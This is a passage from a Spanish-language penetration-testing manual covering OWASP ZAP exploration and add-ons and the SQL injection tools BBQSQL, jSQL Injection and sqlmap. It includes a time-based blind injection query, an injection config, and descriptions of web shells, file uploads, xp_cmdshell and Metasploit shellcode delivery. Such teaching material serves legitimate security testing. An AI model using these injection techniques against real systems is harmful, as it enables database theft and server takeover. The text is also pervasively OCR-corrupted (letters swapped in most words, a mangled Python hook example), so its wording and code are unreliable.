informaeión más relevante que puede a su vez exponer más aplieaeiones web a ZAP. Esto es 
espeeialmente cierto eon eosas eomo formularios de registro donde se requiere una direeción de 
correo electrónieo válida. Ea araña puede entrar al azar una eadena de una lista, lo que provoeará un 
error. Un usuario podrá reaeeionar a este error y proporeionar otra eadena formateada 
eorreetamente, lo que puede haeer que se exponga más de la aplieaeión euando se presenta y aeepta 
el formulario. 

Se debería explorar toda su aplieaeión web eon un navegador proxy a través de ZAP. Para haeer 
esto, ZAP analiza pasivamente todas las solieitudes y las respuestas realizadas durante su 
exploración de las vulnerabilidades, continúa construyendo el árbol del sitio y registra alertas de 
posibles vulnerabilidades eneontradas durante la exploraeión. 

Es importante que ZAP explore eada página de la aplieaeión web, ya sea vineulada a otra página o 
no, en busca de vulnerabilidades. Ea oscuridad no es seguridad y las páginas oeultas 
a veees se aetivan sin aviso ni aviso. 

Se pueden inieiar rápida y fáeilmente los navegadores preeonfigurados para proxy a través de ZAP 
a través de la pestaña Quick Start. Eos navegadores lanzados de esta manera también ignorarán 
cualquier aviso de validaeión de eertifieado que de otra forma serían reportadas. 

Para explorar manualmente la aplieaeión: 

1. Iniciar ZAP y hacer elie en la pestaña Quiek Start de la Ventana Workspaee. 

2. Hacer clic en el botón grande Manual Explore 

3. En el euadro de texto URL a explorar, ingrese la URL eompleta de la aplieaeión web que se 
desea explorar. 

4. Seleecionar el navegador que le gustaría usar 

5. Haeer elie en el botón Launeh Browser 

6. Esta opeión lanzará eualquiera de los navegadores más eomunes que haya instalado eon 
nuevos perfdes.. 


Si desea utilizar cualquiera de sus navegadores eon un perfil existente, por ejemplo, eon otros 
eomplementos de navegador instalados, entonees neeesitará eonfigurar manualmente el navegador 
eomo proxy mediante ZAP e importar y eonfíar en el eertifieado ZAP Root CA Certifieate. 



65.3. 


Caraterísticas avanzadas de ZAP 


Funciones avanzadas de escritorio 

El escritorio tiene una gran cantidad de características que no son evidentes de inmediato, por lo 
que los usuarios no están abrumados. 

Hay muchas pestañas que no se muestran por defecto. Se puede acceder a estas opciones a través de 
las pestañas de la derecha con iconos verdes "+". Se puede anclar cualquier pestaña que se desee 
que aparezca siempre a la derecha haciendo clic en ellas. Muchas de las pestañas ocultas por 
defecto aparecerán cuando sea relevante. Por ejemplo, la pestaña Websockets aparecerá si una 
aplicación que está utilizando a través de ZAP comienza a usar Websockets. 

El escritorio también hace un uso intensivo de las opciones del clic derecho sensibles al contexto, 
así que hacer clic en el botón derecho del ratón en todas partes mientras te acostumbras a la interfaz 
de usuario. 

El mercado de ZAP 

El escritorio de ZAP tiene una arquitectura de add-ons, lo que significa que se pueden agregar 
nuevas funciones dinámicamente. 

Un mercado en línea ofrece una amplia gama de add-ons de ZAP que agregan muchas más 
características de ZAP. 

Se puede acceder al mercado a través del botón "Manage add-ons" en la barra de herramientas.. 
Todos los add-ons en el mercado son completamente gratuitos. 

Automatización 

ZAP es una herramienta ideal a usar en automatización. 

Se puede ejecutar en modo headless y tiene una potente API que le permite controlar casi todos 
de las funciones disponibles a través del escritorio ZAP. 

65.4. Add-ons 

Eos add-ons agregan funcionalidad adicional a ZAP. Tienen acceso completo a todas las partes 
internas de ZAP y por lo tanto pueden proporcionar nuevas funciones muy potentes. 

Puede instalar add-ons dinámicamente desde el mercado de add-ons en línea a través del cuadro de 
diálogo Manage add-ons. 

Por lo general, puede agregar y quitar complementos a y desde la interfaz de usuario de ZAP sin 
tener que reiniciarlo. 

A continuación hay una lista de add-ons 


alertPilters 

Run tests with JUnit 5 

alertReport 

Update libraries/plugins for newer Java versions 

allinonenotes 

Do not set the background colour of help pages 

amf 

Do not set the background colour of help pages 

ascanrules 

ascanrules: update ZAP to 2.9.0 

ascanrulesAlpha 

ascanrulesAlpha: update ZAP to 2.9.0 

ascanrulesBeta 

ascanrulesBeta: update ZAP to 2.9.0 

authstats 

Do not set the background colour of help pages 

beanshell 

Do not set the background colour of help pages 

birtreports 

Do not set the background colour of help pages 




browserView 

Do not set the background colour of help pages 

bruteforce 

Run tests with JUnit 5 

bugtracker 

bugtracker: Update Dependeney 

callgraph 

Merge pulí request #2340 from kingthorin/callg-dep-updt 

cmss 

Run tests with JUnit 5 

codedx 

codedex: remove unnecessary extends 

commonlib 

commonlib: prepare next dev iteration 

coreLang 

Do not set the background colour of help pages 

custompayloads 

custompayloads: update ZAP to 2.9.0 

customreport 

Do not set the background colour of help pages 

diff 

Merge pulí request #2341 from kingthorin/diff-dep-updt 

directorylistvl 

Do not set the background colour of help pages 

directorylistv2 3 

Do not set the background colour of help pages 

directorylistvl 3 le 

Do not set the background colour of help pages 

domxss 

Update ZAP to 2.9.0 in DOM XSS and SOAP 

encoder 

encoder: Remove dependence on core Encoder class 

exportreport 

Update libraries/plugins for newer Java versions 

formhandler 

Do not set the background colour of help pages 

frontendscanner 

Do not set the background colour of help pages 

fuzz 

Run tests with JUnit 5 

fuzzdb 

fuzzdb:Prepare next dev iteration 

gettingStarted 

Do not set the background colour of help pages 

graaljs 

Do not set the background colour of help pages 

groovy 

Run tests with JUnit 5 

highlighter 

Do not set the background colour of help pages 

httpsinfo 

Update owasp.org References 

imagelocationscanner 

Run tests with JUnit 5 

importLogFiles 

Do not set the background colour of help pages 

importurls 

Do not set the background colour of help pages 

invoke 

Do not set the background colour of help pages 

jruby 

Run tests with JUnit 5 

jsonview 

Do not set the background colour of help pages 

jython 

Run tests with JUnit 5 

onlineMenu 

Do not set the background colour of help pages 

openapi 

Fix typo 

plugnhack 

Do not set the background colour of help pages 

portscan 

Do not set the background colour of help pages 

pscanrules 

pscanrules: CSP sean rule upgrade salvation to 2.7.2 

pscanrulesAlpha 

Run tests with JUnit 5 

pscanrulesBeta 

Run tests with JUnit 5 

quickstart 

quickstart: use AJAX Spider options 

regextester 

Do not set the background colour of help pages 

replacer 

Run tests with JUnit 5 




requester 

Do not set the background colour of help pages 

retire 

Retire; Change "info" to proper references & change 
otherinfo handling 

reveal 

Do not set the background colour of help pages 

revisit 

Do not set the background colour of help pages 

saml 

Update owasp.org References 

saverawmessage 

Do not set the background colour of help pages 

savexmlmessage 

Do not set the background colour of help pages 

Scripts 

Scripts: tweak help 

selenium 

Run tests with JUnit 5 

sequence 

Do not set the background colour of help pages 

simpleexample 

Do not set the background colour of help pages 

soap 

Run tests with JUnit 5 

spiderAjax 

Do not set the background colour of help pages 

sqliplugin 

Update owasp.org References 

sse 

Run tests with JUnit 5 

svndigger 

Do not set the background colour of help pages 

tips 

tips-and-tricks: Update docker refs 

tlsdebug 

tlsdebug: replace hardcoded colour 

todo 

Do not set the background colour of help pages 

tokengen 

Run tests with JUnit 5 

treetools 

Do not set the background colour of help pages 

viewstate 

Do not set the background colour of help pages 

vulncheck 

Do not set the background colour of help pages 

wappalyzer 

Run tests with JUnit 5 

wavsepRpt 

Do not set the background colour of help pages 

webdrivers 

Update libraries/plugins for newer Java versions 

websocket 

Run tests with JUnit 5 

zest 

Run tests with JUnit 5 





































66. EVALUACIÓN DE LA BASE DE DATOS 


bbqsql 

marco de inyección SQL 

Jsql injection 

Es una aplicación ligera usada para encontrar la información de la base de datos de 
un servidor alejado. 

sqlmap 

Herramienta de prueba de penetración de código abierto que automatiza el proceso 
de detección y explotación de fallos de inyección SQL 

sqlninja 

Herramienta diseñada para explotar las vulnerabilidades de inyección de SQL en 
una aplicación web que utiliza Microsoft SQL Server 

sqlsus 

Herramienta de inyección y adquisición de MySQL 




67. BBQSQL 


BBQSQL es un marco de inyección SQL ciego escrito en Python. Es extremadamente útil cuando 
se ataca vulnerabilidades de inyección de SQL difíciles. También BBQSQL es una herramienta 
semiautomática, que permite un poco de personalización para aquellas búsquedas difíciles en una 
inyección SQL. La herramienta está diseñada para ser independiente de la base de datos y es 
extremadamente versátil. También tiene una interfaz de usuario intuitiva para facilitar la 
confíguración de los ataques. También está implementado el Python GEvent, lo que hace que 
BBQSQL sea extremadamente rápido. 

Para su uso, ejecutar bbqsql y aparecerá el menú siguiente: 

Select from the menú: 

1) Setup HTTP Parameters 

2) Setup BBQSQL Options 

3) Export Config 

4) Import Confíg 

5) Run Exploit 

6) Help, Credits, and About 

99) Exit the bbqsql injection toolkit 

Parámetros HTTP 

Estos parámetros se necesitan para determinar como se verá la solicitud HTTP. Los 
parámetros HTTP disponibles son: 

0) files 

1) headers 

2) cookies 

3) url 

4) allow redirects 

5) proxies 

6) data 

7) method 

8) auth 

Cuando se haya terminado de confígurar los parámetros HTTP, se puede continuar con las opciones 
BBQSQL. Los parámetros HTTP confíguran el ataque a realizar. Como minimo, se debe 
proporcionar la URL, donde se desea que se ejecute la consulta de inyección y el método. 

Se debe especifícar donde desea que se inserte la consulta de inyección utilizando la plantilla 
$ {injection}. Sin la plantilla de inyección, la herramienta no sabrá donde insertar la consulta. 

Parámetro fíles 

Proporciona los archivos que se enviarán con la solicitud. Establecer el valor en la ruta y BBQSQL 
se encargará de abrir/incluir el archivo. 

Parámetro headers 

Estos encabezados HTTP son los que se enviarán con las solicitudes. Esto puede ser una cadena o 
un diccionario. Por ejemplo: {"User-Agent":"bbqsql"} o "User-Agent: bbqsql" 



Parámetro cookíes 

Especifica un diccionario o una cadena de cookies que se enviarán con la solicitud. Por ejemplo: 

{"PHPSES SIONID " :"123123"}o PHPSES SIONID= 123123; JSES SIONID=foobar 

Parámetro url 

Especifica la EÍRL a la que se deben enviar las solicitudes. 

Parámetro allow redirects 

Este es un valor booleano que determina si se seguirán o no los redireccionamientos HTTP al 
realizar las solicitudes. 

Parámetro proxies 

Especifica el proxy HTTP que se utilizará para la solicitud como diccionario. Por ejemplo: 

{"http": "10.10.1.10:3128","https": "10.10.1.10:1080"} 

Parámetro data 

Especifica los datos POST que se enviarán junto con la solicitud. Esto puede ser una cadena o un 
diccionario. Por ejemplo: {"input field":"valué"} o input_field=value 

Parámetro method 

Especifica el método para la solicitud HTTP. Eos métodos válidos son get, options, head, post, put, 
patch, delete 

Parámetro auth 

Especifica una tupia de nombre de usuario y contraseña que se utilizará para la autenticación básica 
HTTP. Por ejemplo: ("myusemame","mypassword") 

Opciones BBQSQL 

Eas posibles opciones son las siguientes: 

0) csv output file 

1) technique 

2) comparison attr 

3) concurrency 

4) hooks file 

5) query 

Opción csv output file 

El nombre de un archivo para generar los resultados. Dejar esto en blanco si no desea la salida a un 
archivo. 

Opción technique 

BBQSQE utiliza 2 técnicas cuando realiza un ataque ciego de inyección SQE. Ea primera técnica y 
predeterminada utilizada es binary search. Ea segunda técnica que puede usar es frequency search. 
Esta búsqueda de frecuencia se basa en un análisis del idioma inglés para determinar la frecuencia 
en que se producirá una letra. Este método de búsqueda es muy rápido contra datos no entrópicos, 
pero puede ser lento contra datos no ofúscados u ofúscados. 

Se puede especificar binary search o frequency search como el valor para este parámetro. 

Opción comparison attr 

Esto especifica el tipo de inyección SQL que ha descubierto. Aqui se puede establecer que atributo 
de la respuesta HTTP debe observar BBQSQL para determinar verdadero/falso. Puede especificar: 



status code, url, time, size, text, content, encoding, cookies, headers o history 
Si ha identificado la inyección SQL que da como resultado un código de estado del servidor 
diferente, configurar el parámetro status code. Si la cookie es diferente del parámetro cookie, 
configurar 'cookie'. Si el tamaño de la respuesta es diferente, configurar el parámetro size. 

Opción concurrency 

La concurrencia se basa en la biblioteca GEvent en Python. Funcionalmente parece actuar como un 
subproceso. Esta configuración controla la cantidad de concurrencia para ejecutar el ataque. Esto es 
útil para limitar las solicitudes y acelerar los tiempos de ataque. Para servidores web de alto 
rendimiento como nginx, se puede establecer la concurrencia en 75. De forma predeterminada, está 
configurado en 30. 

Opción hooksfile 

A veces se necesita cifrar los valores que ingresan en un campo antes de enviar la solicitud o tal vez 
se necesite triplicar la codificación de URL. En cualquier caso, estas situaciones hacen que otras 
herramientas sean imposibles de usar. BBQSQE permite definir funciones hook que la herramienta 
llamará en varios puntos a lo largo de la solicitud. Por ejemplo puede especificar una función 
pre_request que tome la solicitud como argumento, haga las mutaciones necesarias y devuelva la 
solicitud modificada para enviarla al servidor. 

Para implementar esto, simplemente crear un archivo llamado bbqsql hooks.py en el directorio de 
trabajo actual. Aqui se puede definir sus funciones de devolución de llamada para los hooks. 
Después en la parte inferior de este archivo, agregar un diccionario llamado hooks, cuyo formato es 
{'hook name': hook fúnction}. 

Cuando se ejecute BBQSQE, buscará en su directorio actual el archivo bbqsql hooks.py e 
importará de él el diccionario llamado hooks. 

Eos siguientes hooks están disponibles: 

args: Un diccionario de los argumentos que se envían a Request() 
pre request: El objeto Request, directamente antes de ser enviado, 
post request: El objeto Request, directamente después de ser enviado, 
responso: la respuesta generada a partir de una solicitud. 

Un ejemplo de archivo bbqsql hooks.py podría verse asi: 

'"python 

# file: bbqsql_hooks.py 

import time 

def my_pre_hook(req): 

IMM» 

this hook replaces a placeholder with the current time 
expecting the url to look like this: 

http://www.google.com?k=v&time=PEACEHOEDER 

IMM» 

req.url .replac e('PE ACEHOLDER', str(time. time())) 
retum req 

hooks = {'prerequest':my_pre_hook} 

Opción querv 

Si se encuentra con una vulnerabilidad de inyección SQE que tiene algunas peculiaridades extrañas 
como ciertos caracteres que no se pueden incluir o funciones como ASCII/CHAR que no funcionan, 
probablemente se haya encontrado escribiendo algún tipo de script con su sintaxis de inyección 



personalizada. BBQSQL elimina la parte de secueneias de eomandos y proporeiona una forma de 
pegar su sintaxis de eonsulta personalizada y explotarla eon facilidad. 

La entrada de consulta es donde construirá su consulta utilizada para filtrar la información de la 
base de datos. La suposición es que ya ha identificado la inyección SQL en un parámetro vulnerable 
y se ha probado una consulta exitosa. 

A continuación se muestra una consulta de ejemplo que puede utilizar para construir una consulta. 
En este ejemplo, el atacante está buscando seleccionar la versión de la base de datos: 

vulnerable_parameter; if(ASCII(SUBSTRING((SELECT @@version LIMIT 1 OFFSET $ 
{row_mdex}) , ${char_mdex} ,1))) ${comparator:>}ASCII(${char_val}) WAITFOR DELAY 
’0\:0\:0${sleep}'; - 

La sintaxis de la consulta se basa en marcadores de posición que le indican a BBQSQL como 
ejecutar el ataque. Se deben proporcionar los siguientes marcadores de posición de información 
para que el ataque funcione y una vez que ponga estos datos en la consulta, BBQSQL hará el resto: 

$ {row index}: Esto le dice a BBQSQL que repita las filas aquí indicadas. Como estamos usando 
LIMIT podemos ver n número de filas dependiendo del valor de $ {row index}. 

${char_index}: Esto le dice a BBQSQL que carácter de la subselección consultar. 

${char_val}: Esto le dice a BBQSQL donde comparar los resultados de la subselección para validar 
el resultado. 

${comparator}: Así es como le dice a BBQSQL que compare las respuestas para determinar si el 
resultado es verdadero o no. Por defecto, se usa el símbolo >. 

${sleep}: Este es opcional pero le dice a BBQSQL donde insertar el número de segundos a esperar 
cuando se realiza una inyección SQL basada en el tiempo. 

No se requieren todos estos marcadores de posición. Por ejemplo, si ha descubierto una inyección 
SQL basada en booleanos semi-ciegos, se puede omitir el parámetro ${sleep} 

Export Config 

Después de configurar el ataque en la interfaz de usuario, se puede exportar el archivo de 
configuración. El archivo de configuración exportado utiliza ConfigParser y es fácil de leer. Un 
archivo de configuración de ejemplo se puede ver a continuación: 

[Request Config] 

url = http://example.com/sqlivuln/index.php?username=userl&password=secret${injection} 
method = GET 

[HTTP Config] 

query = and ASCII(SUBSTR((SELECT data FROM data LIMIT I OFFSET ${row_index:I}),$ 

{char_index:I},I))${comparator:>}${char_val:0} # 

technique = binarysearch 

comparisonattr = size 

concurrency = 30' 


Esto es útil si se planea reanudar un ataque o tal vez simplemente ajustar la consulta, pero no se 
quiere pasar por la molestia de reconfigurar cada opción. 



Import Config 

También se puede importar una eonfiguraeión desde la linea de eomandos o desde la interfaz de 
usuario. Para importar una eonfiguraeión desde la linea de eomandos simplemente ejeeutar 

bbqsql -e arehivo eonfiguraeión 

Cuando earga un arehivo de eonfiguraeión a través de la linea de eomandos o la interfaz de usuario, 
se ejeeutan las mismas rutinas de validación en los parámetros para asegurarse de que sean válidas. 

Ejemplo 

Establecer los parámetros siguientes: 

• URL: http://google.com?vuln=$ {query} 

• data: user=foo&pass=$ {query} 

• cookies: {'PHPSESSID': T23123 ',' foo ’, ’ BAR $ {query}’} 



68. JSQL Injection 


jSQL Injection es una aplicación ligera usada para encontrar la información de la base de datos de 
un servidor alejado. jSQL Injection es gratis, open source and cross-platform (Windows, Linux, 

Mac OS X, Solaris). 

Características 

• Inyección automática de 23 tipos de bases de datos: Access, CockroachDB, CUBRID, DB2, 
Derby, Firebird, H2, Hana, HSQLDB, Informix, Ingres, MaxDB, Mckoi, MySQL, Neo4j, 
NuoDB, Oracle, PostgreSQL, SQLite, SQL Server, Sybase , Teradata y Vertica 

• Múltiples estrategias de inyección: normal, error, blind y time. 

• Múltiples estructuras de inyección: estándar, zipped, dump in one shot 

• Motor SQL para estudiar y optimizar expresiones SQL 

• Inyección de múltiples objetivos. 

• Buscar páginas de administración 

• Creación y visualización de Web Shell y SQL Shell. 

• Leer y escribir archivos en el host mediante inyección 

• Fuerza bruta del hash de contraseña 

• Codificar y decodificar una cadena 

jSQL Injection es una herramienta de prueba de penetración multipropósito. Su función principal es 
encontrar y explotar vulnerabilidades de inyección SQL. También es capaz de: 

• explorar bases de datos desde el dispositivo remoto 

• buscar páginas de administrador, 

• leer archivos del dispositivo remoto mediante inyección, 

• crear una shell web para el dispositivo remoto y abrir una terminal 

• crear una shell SQL para el dispositivo remoto y abrir una terminal 

• subir un archivo al dispositivo 

• hashes de fúerza bruta 

• codificar o decodificar una cadena 

• probar múltiples URL para inyección SQL 

Para detectar y explotar inyecciones SQL, generalmente se prefiere sqlmap. Es una utilidad de linea 
de comandos, puede hacer muchas cosas, utiliza todos los métodos de inyección SQL posibles, trata 
de eludir la protección del servidor, puede crear shells y mucho más. También es multiplataforma, 
confiable y muy eficaz. Dado que sqlmap es extremadamente potente y flexible, para el programa 
de linea de comandos significa una gran cantidad de opciones diferentes. 

Cuando se ejecuta el programa jSQL Injection, se vusualiza la pantalla que se ve a continuación. 
Esta pantalla está dividida en 2 zonas, una superior y otra inferior y en la linea superior es donde se 
debe escribir la URL a la que se intenta hacer una inyección SQL. 

La ventana superior tiene las 9 pestañas siguientes: 

• Database. Nombre de las bases de datos aparecidas en la inyección. 

• Admin page. Nombre de las páginas a inyectar. 

• Read file. Nombre de los ficheros a inyectar. 

• Web shell. Nombre de los directorios a inyectar. 

• SQL shell. Nombre de los directorios a inyectar. 

• Upload. Nombre de los directorios donde se puede intentar subir un fichero. 






• Brute forcé. Parámetros para la realizaeión de fuerza bruta. 

• Eneoding. Esta pantalla permite codifiear con Base64 una cadena de caraeteres. 

• Batch sean 

En la ventana inferior hay las 4 pestañas siguientes 

• Consolé. En esta pestaña, se muestran todos los mensajes que se ven generando en la 
operativa. 

• Chunk. En esta pestaña, se muestran los datos extraídos de la inyeeeión 

• Boolean. En esta pestaña, se muestran los caraeteres extraídos durante la inyeeeión ciega o 
por tiempo 

• NetWork. En esta pestaña, se visualizan la URL, el método empleado, el tamaño y el tipo 
A eontinuaeión eon los ejemplos, se puede eomo usar las pestañas y los eontenidos. 

Ejemplo 1 

Eseaneo de un sitio web 

Ingresar la direeeión del sitio y presionar ENTER. 

La siguiente eaptura de pantalla muestra que el sitio es vulnerable a 3 tipos de inyeeeiones SQL a la 
vez. Se visualizan los nombres de las bases de datos disponibles. 



Haeer elie en una base de datos para explorar sus tablas y se puede ver el eontenido de cada tabla. 
Hacer elie en una tabla y se visualizan sus eampos, uno en eada columna. 

Por lo general, las tablas administrator y users son las más interesantes, ya que pueden eontener 
eredenciales. 

Ejemplo 2 

Buseando en la pestaña Admin page 

Para hacer esto, ir a esta pestaña y alli se encuentra una lista de posibles direeeiones. Se puede 
seleeeionar una o más páginas a verificar. 







La conveniencia es que no necesita usar otros programas. 

Desafortunadamente los programadores negligentes que almacenan contraseñas en pruebas claras, 
no son muy numerosos. Muy a menudo en la linea de contraseña vemos algo como 
8743b52063cd84097a65dl633f5c74f5 

Esto es un hash y se puede deseifrarlo eon fuerza bruta, opeión que incorpora jSQL Injection. 

Ejemplo 3 

Hashes de fuerza bruta 

Hay soporte para muchos de los hashes más populares, sin embargo no es la mejor solución. Para 
fuerza bruta en la velocidad máxima, usar hashcat. 

Sin embargo cuando no hay otro programa disponible o no hay tiempo para aprender hashcat, la 
inyección JSQL incorpora la función de fuerza bruta en la pestaña Brute Foree. 

En las configuraeiones, se puede especificar el número de caracteres nn la contraseña, el rango de 
longitud de la contraseña. 








Ejemplo 4 

Operaciones con archivos después de la detección de las inyecciones SOL 

Además de las operaciones de la base de datos: leerlas y modificarlas, en el caso de detectar 

inyecciones SQL, son posibles las siguientes operaciones de archivos: 

• leer archivos en el servidor 

• subir nuevos archivos al servidor 

• descargar shells al servidor 

Existen restricciones ya que el servidor SQL debe tener suficientes privilegios. Los buenos 
administradores del sistema deshabilitan esta opción y no se puede obtener acceso al sistema de 
archivos. 

La presencia de los privilegios de los archivos es bastante fácil de verificar. Ir a una de las pestañas 
reading files, creating a shell o uploading a new fde y probar una de las operaciones especificadas. 
Se necesita saber la ruta absoluta exacta al archivo con el que se trabaje, de lo contrario no 
funcionará. 




Si la respuesta a una operación de archivo es sin privilegios de archivo, no se puede hacer nada al 
respecto. Si en cambio aparece el mensaje de error: Problem writing into [folder name] 

Esto significa que se ha especificado incorrectamente la ruta absoluta en la que se debe escribir el 
archivo. Para asumir la ruta absoluta, se necesita como mínimo conocer el sistema operativo en el 
que se ejecuta el servidor. Para hacer esto, ir a la pestaña NetWork. 

En Windows, la carpeta típica para los sitios es C:\Server\data\htdocs\ y el intento comienza 
directamente desde la carpeta C: / Windows /: 

Ejemplo 5 

Verificación masiva de sitios 

Incluso esta función está en la inyección jSQL. Todo es extremadamente simple: insertar una lista 
de sitios que se pueden importar desde un archivo, seleccionar los que desee verificar y hacer clic 
en el botón para iniciar la operación. 





























69. Sqlmap 


sqlmap es una herramienta de prueba de penetración de código abierto que automatiza el proceso de 
detección y explotación de fallos de inyección SQL y toma de control de los servidores de bases de 
datos. Tiene con un potente motor de detección, muchas funciones de penetración y una amplia 
gama de opciones que van desde el fmgerprinting de la base de datos, hasta la obtención de datos de 
la base de datos, hasta el acceso al sistema de archivos subyacente y la ejecución de comandos en el 
sistema operativo a través de conexiones fuera de banda. 

69.1. Características 

Características generales 

• Soporte completo para los sistemas de administración de bases de datos MySQL, Oracle, 
PostgreSQL, Microsoft SQL Server, Microsoft Access, SQLite, Firebird, Sybase y SAP 
MaxDB. 

• Soporte completo para las técnicas de inyección de SQL: ciego basado en booleano, ciego 
basado en tiempo, basado en errores, consulta LTNION y consultas apiladas. 

• Soporte para conectarse directamente a la base de datos sin pasar por una inyección SQL, 
proporcionando las credenciales DBMS, la dirección IP, el puerto y el nombre de la base de 
datos. 

• Es posible proporcionar una URL de destino única, obtener la lista de objetivos del proxy de 
Burp o archivos de registro de solicitudes de proxy WebScarab, obtener la solicitud HTTP 
completa de un archivo de texto u obtener la lista de objetivos proporcionandos por el 
sqlmap con un dork de Google que consulta el buscador de Google y analiza su página de 
resultados. También puede definir un ámbito basado en expresiones regulares que se utiliza 
para identificar cual de las direcciones analizadas a probar. 

• Las pruebas proporcionaron los parámetros GET, los parámetros POST, los valores de 
encabezado HTTP Cookie, el valor de encabezado HTTP UserAgent y el valor de 
encabezado HTTP Referer para identificar y explotar vulnerabilidades de inyección SQE. 
También es posible especificar una lista separada por comas de parámetros especificos a 
probar. 

• Opción para especificar el número máximo de solicitudes HTTP(S) concurrentes 
(subprocesamiento múltiple) para acelerar las técnicas de inyección ciega de SQE ytambién 
es posible especificar el número de segundos a mantener entre cada solicitud HTTP(S). 

• Soporte de cadena de encabezado HTTP cookie, útil cuando la aplicación web requiere 
autenticación basada en cookies y tiene estos datos o en caso de que solo quiera probarlo y 
explotar la inyección SQE con dichos valores de encabezado. También se puede especificar 
la cookie codificada con URL. 

• Maneja automáticamente el encabezado HTTP Set-Cookie de la aplicación, restableciendo 
la sesión si caduca. También es compatible probar y explotar en estos valores. También 
puede forzar a ignorar cualquier encabezado Set-Cookie. 

• Soporte de autenticaciones de protocolo HTTP Basic, Digest, NTLM y Certificate. 

• Soporte de proxy HTTP(S) para pasar las solicitudes a la aplicación de destino que fúnciona 
también con solicitudes HTTPS y con servidores proxy autenticados. 

• Opciones para falsificar el valor del encabezado HTTP Referer y el valor del encabezado 
HTTP User-Agent especificado por el usuario o seleccionado al azar de un archivo de texto. 

• Soporte para aumentar el nivel de verbosidad de los mensajes de salida: existen 7 niveles de 
verbosidad. 



• Soporte para analizar formularios HTML desde la URL de destino y falsifíear solieitudes 
HTTP(S) eontra estas páginas para probar los parámetros del formulario eontra 
vulnerabilidades. 

• Granularidad y flexibilidad en términos de los eonmutadores y funciones del usuario. 

• Soporte de tiempo estimado de llegada para cada consulta, actualizado en tiempo real, para 
proporcionar al usuario con un resumen sobre cuanto tiempo llevará recuperar los resultados 
de las consultas. 

• Guarda automáticamente la sesión en un archivo de texto en tiempo real mientras recupera 
los datos y reanuda la inyección analizando el archivo de sesión. 

• Soporte para leer opciones de un archivo INI de conflguración en lugar de especiflcar cada 
vez todas las opciones en la línea de comando. Soporte también para generar un archivo de 
conflguración basado en las opciones de la línea de comando proporcionados. 

• Soporte para replicar la estructura de tablas y las entradas de la base de datos en una base de 
datos local SQLite 3. 

• Opción para actualizar sqlmap a la última versión de desarrollo desde el repositorio de 
subversión. 

• Soporte para analizar respuestas HTTP(S) y mostrar cualquier mensaje de error DBMS al 
usuario. 

• Integración con otros proyectos de código abierto de seguridad de TI, Metasploit y w3af 

Características de fingerprint y enumeración 

• Amplia versión del software de la base de datos back-end y huella digital del sistema 
operativo subyacente basada en mensajes de error, análisis de banners, comparación de 
resultados de funciones y características específlcas como la inyección de comentarios 
MySQL. También es posible forzar la gestión de la base de datos de fondo con el nombre 
del sistema si ya se sabes. 

• Software de servidor web básico y tecnología de aplicación web de huellas digitales. 

• Soporte para recuperar el banner DBMS, el usuario de sesión y la información de la base de 
datos actual. La herramienta también puede veriflcar si el usuario de la sesión es un 
administrador de base de datos (DBA). 

• Soporte para enumerar usuarios de bases de datos, los hashes de contraseñas de usuarios, los 
privilegios de usuarios, los roles de usuarios, las bases de datos, las tablas y las columnas. 

• Reconocimiento automático del formato del hash de contraseña y soporte para descifrarlos 
con un ataque basado en diccionario. 

• Soporte para tablas de fuerza bruta y nombre de columnas. Esto es útil cuando el usuario de 
la sesión no tiene acceso de lectura sobre la tabla del sistema que contiene la información 
del esquema o cuando el sistema de administración de la base de datos no almacena esta 
información en algún lugar. 

• Soporte para volcar las tablas de bases de datos por completo, un rango de entradas o 
columnas específlcas según la elección del usuario. El usuario también puede elegir volcar 
solo un rango de caracteres de la entrada de cada columna. 

• Soporte para volcar automáticamente todos los esquemas y entradas de las bases de datos. 

Es posible excluir del volcado, las bases de datos del sistema. 

• Soporte para buscar nombres de bases de datos específicos, tablas específlcas en todas las 
bases de datos o columnas específlcas en todas las tablas de bases de datos. Por ejemplo esto 
es útil para identificar tablas que contienen credenciales de aplicación personalizadas donde 
los nombres de columnas relevantes contienen cadenas como nombre y contraseña. 

• Soporte para ejecutar sentencias SQE personalizadas como en un cliente SQE interactivo 
que se conecta a la base de datos de back-end. sqlmap disecciona automáticamente la 
declaración proporcionada, determina que técnica es la mejor para la inyección y en 
consecuencia como empaquetar la payload de SQE. 



Funciones de adquisición 

• Soporte para inyectar funciones personalizadas definidas por el usuario: el usuario puede 
compilar una biblioteca compartida y luego usar sqlmap para crear dentro de las funciones 
definidas por el usuario del DBMS de fondo a partir del archivo compilado de la biblioteca 
compartida. Estos UDF se pueden ejecutar y opcionalmente eliminar a través de sqlmap. 

Esto es compatible cuando el software de la base de datos es MySQE o PostgreSQE. 

• Soporte para descargar y cargar cualquier archivo del sistema de archivos subyacente del 
servidor de bases de datos cuando el software de la base de datos es MySQE, PostgreSQE o 
Microsoft SQE Server. 

• • Soporte para ejecutar comandos arbitrarios y recuperar su salida estándar en el sistema 
operativo subyacente del servidor de la base de datos, cuando el software de la base de datos 
es MySQE, PostgreSQE o Microsoft SQL Server. 

- En MySQE y PostgreSQE a través de la inyección y ejecución de funciones definidas 
por el usuario. 

- En Microsoft SQL Server a través del procedimiento almacenado xp cmdshell (). 
Además, el procedimiento almacenado se vuelve a habilitar si se deshabilita o se crea 
desde cero si el DBA lo elimina. 

• Soporte para establecer una conexión TCP con estado fuera de banda entre la máquina 
atacante y el sistema operativo subyacente del servidor de bases de datos. Este canal puede 
ser un símbolo del sistema interactivo, una sesión de Meterpreter o una sesión de interfaz 
gráfica de usuario (VNC) según la elección del usuario. Sqlmap confia en Metasploit para 
crear el shellcode e implementa 4 técnicas diferentes para ejecutarlo en el servidor de la base 
de datos. Estas técnicas son: 

1. Ejecución de la base de datos en memoria del shellcode de Metasploit a través de la 
función sys bineval () propia definido por el usuario de sqlmap. Compatible con 
MySQE y PostgreSQE. 

2. Carga y ejecución de una payload stager stand-alone a través de la propia función 
definida por el usuario sqlmap sys_exec() en MySQE y PostgreSQE o via xp_cmdshell() 
en Microsoft SQL Server. 

3. Ejecución del shellcode de Metasploit realizando un ataque de reflexión SMB (MS08- 
068) con una solicitud de ruta UNC desde el servidor de la base de datos a la máquina 
del atacante donde escucha el exploit del servidor smb relay de Metasploit. Se soporta 
cuando se ejecuta sqlmap con altos privilegios (uid = 0) en Linux/Unix y el DBMS de 
destino se ejecuta como Administrador en Windows. 

4. Ejecución de base de datos en memoria del shellcode de Metasploit explotando 

sp replwritetovarbin de Microsoft SQL Servidor 2000 y 2005 (MS09-004). sqlmap 
tiene su propio exploit para activar la vulnerabilidad con automatic DEP memory 
protection bypass, pero se basa en Metasploit para generar el shellcode para ejecutarse 
después de una explotación exitosa. 

